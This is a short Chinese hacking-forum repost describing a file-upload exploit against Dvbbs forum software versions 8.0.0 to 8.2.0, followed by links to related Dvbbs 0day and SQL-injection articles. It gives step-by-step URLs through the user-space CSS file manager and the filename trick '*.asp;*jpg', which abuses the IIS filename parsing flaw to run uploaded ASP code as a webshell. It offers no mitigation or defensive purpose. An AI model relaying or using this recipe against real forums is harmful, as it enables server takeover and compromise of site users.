以前没收藏,现在收藏一下!
----
利用的还是IIS的文件名解析漏洞.
影响版本:
Powered By Dvbbs Version 8.2.0
Powered By Dvbbs Version 8.1.0
Powered By Dvbbs Version 8.0.0
注册用户-我的主页-个人空间管理
userspace.asp?sid=0&act=modifyset
然后编辑CSS风格-文件管理
Dv_plus/myspace/script/filemange.asp
上传 *.asp;*jpg
By:h4ck3rsbr
只显示10条记录相关文章
动网PHP论坛indivgroup_dispbbs.php sql注入漏洞 (浏览: 9548, 评论: 0)
dvbbs php2.0 几处0day (浏览: 12394, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11763, 评论: 0)
dvbbs 8.2前台0day (浏览: 17248, 评论: 0)
动网博客又一Injection (影响:Dvbbs blog) (浏览: 10439, 评论: 0)
dvbbs php2.0 几处0day (浏览: 12394, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11763, 评论: 0)
dvbbs 8.2前台0day (浏览: 17248, 评论: 0)
动网博客又一Injection (影响:Dvbbs blog) (浏览: 10439, 评论: 0)